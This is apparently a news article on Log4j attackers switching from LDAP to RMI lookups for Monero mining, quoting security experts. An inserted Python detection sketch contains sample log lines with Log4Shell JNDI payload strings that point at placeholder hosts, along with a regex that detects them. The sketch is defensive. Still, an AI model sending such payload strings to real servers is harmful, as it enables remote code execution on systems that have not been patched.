Warning: Log4j attackers are switching tactics to make money as experts say it could affect millions of devices for YEARS

EXPERTS warn that Apache Log4j threat actors are switching up their method to secure resources for Monero mining.

Some of the attackers exploiting the Apache Log4j vulnerability, which experts predict could last for years, have moved from using LDAP to RMI in an attempt to maximize their chances of success.

Up until recently, most of the attacks on the Java-based logging utility have been through a service called LDAP, or Lightweight Directory Access Protocol.

Now hackers have found that by switching to RMI (Remote Method Invocation) they can sometimes avoid additional security checkpoints.

Furthermore, as some JVM (Java Virtual Machine) versions are built with less-strict features, RMI can sometimes be an easier road to achieving RCE (remote code execution) than LDAP.

Juniper Labs has found that some of the threat actors are actually using both LDAP and RMI to attack Log4j’s vulnerability in the hopes of increasing their chances of success.
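For defenders, the shift described above means a detection keyed only on LDAP lookups will miss the RMI variant. The following Python sketch is an added example, not code from the article or from Juniper Labs; the log lines are constructed, use documentation-range addresses, and the pattern matches only the plain form of the JNDI lookup string.

```python
import re
from collections import defaultdict

# Constructed access-log lines (not real traffic); all addresses are
# from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [17/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
192.0.2.10 - - [17/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:rmi://198.51.100.7:1099/b}"
192.0.2.44 - - [17/Dec/2021:10:02:11 +0000] "GET /?q=${JNDI:RMI://203.0.113.5/c} HTTP/1.1" 404 0 "-" "curl/7.79"
192.0.2.99 - - [17/Dec/2021:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Plain JNDI lookup with an LDAP(S) or RMI target, matched case-insensitively.
JNDI_RE = re.compile(r"\$\{jndi:(ldaps?|rmi)://([^/\s}:]+)", re.IGNORECASE)

def find_lookups(line):
    """Return (scheme, callback_host) for each plain JNDI lookup in a line."""
    return [(m.group(1).lower(), m.group(2).lower())
            for m in JNDI_RE.finditer(line)]

def summarize(log_text):
    """Map each client IP (first log field) to the set of schemes it sent."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        hits = find_lookups(line)
        if hits:
            client = line.split(" ", 1)[0]
            seen[client].update(scheme for scheme, _ in hits)
    return dict(seen)

def missed_by_ldap_only_rule(log_text):
    """Clients that a rule matching only LDAP lookups would not flag."""
    return sorted(client for client, schemes in summarize(log_text).items()
                  if not any(s.startswith("ldap") for s in schemes))

def multi_protocol_clients(log_text):
    """Clients that tried more than one protocol, as Juniper Labs describes."""
    return sorted(client for client, schemes in summarize(log_text).items()
                  if len(schemes) > 1)

if __name__ == "__main__":
    print("per-client schemes:", summarize(SAMPLE_LOG))
    print("missed by LDAP-only rule:", missed_by_ldap_only_rule(SAMPLE_LOG))
    print("used both protocols:", multi_protocol_clients(SAMPLE_LOG))
```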

Some of the attackers appear to have one goal in mind: hijack resources to mine Monero, an unusual type of cryptocurrency.

Threat actors have described the activity as something that “ain’t going to harm anyone else,” according to Juniper Labs’ reports.


The cybersecurity world has been on high alert ever since the vulnerability, which puts systems running Apache Log4j version 2.14.1 or below at risk of being compromised, was discovered last week.

“As soon as I saw how you could exploit it, it was horrifying,” Peter Membrey, chief architect of ExpressVPN, said.

“Like one of those disaster movies where there’s a nuclear power plant, they find it’s going to melt down, but they can’t stop it. You know what’s coming, but there are very limited things you can do.”

Experts have been desperately trying to identify vulnerable programs as well as prevent exploits wherever possible, but the list of the affected software, as compiled by the Cybersecurity and Infrastructure Security Agency (CISA), is hundreds long.

Meanwhile, the number of affected applications, experts believe, is undoubtedly in the thousands.

“I ran queries in our database to see every customer who was using Log4j in any of their applications, and the answer was: every single one of them that has any applications written in Java,” Jeremy Katz, co-founder of Tidelift, said.

The Java-based logging utility has been the victim of thousands of attacks daily, as of late.
